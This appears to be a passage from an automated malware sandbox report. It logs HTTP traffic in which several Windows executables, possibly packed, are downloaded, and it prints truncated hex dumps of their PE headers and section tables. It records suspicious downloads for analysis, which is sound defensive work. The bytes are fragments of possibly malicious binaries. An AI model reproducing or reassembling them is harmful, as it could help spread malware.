00 00 06 00 00 00 00 00 00 00 00 f0 4b 00 00 04 00 00 61 77 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 90 05 00 6b 00 00 00 00 80 05 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 05 00 00 10 00 00 00 8a 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 80 05 00 00 02 00 00 00 9a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 05 00 00 02 00 00 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 70 2b 00 00 a0 05 00 00 02 00 00 00 9e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 76 6e 70 72 65 6e 6f 00 a0 1a 00 00 10 31 00 00 98 1a 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 66 67 74 6e 6c 66 77 00 10 00 00 00 b0 4b 00 00 04 00 00 00 38 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 4b 00 00 22 00 00 00 3c 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Feb 2025 16:18:38 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Feb 2025 16:18:39 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Feb 2025 16:18:40 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Feb 2025 16:18:41 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 16:18:40 GMTContent-Type: application/octet-streamContent-Length: 972800Last-Modified: Sat, 01 Feb 2025 16:11:23 GMTConnection: keep-aliveETag: "679e47ab-ed800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 82 47 9e 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 28 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 0f 00 00 04 00 00 4b 95 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 c4 6c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c4 6c 01 00 00 40 0d 00 00 6e 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 b0 0e 00 00 76 00 00 00 62 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Feb 2025 16:18:43 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Feb 2025 16:18:43 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 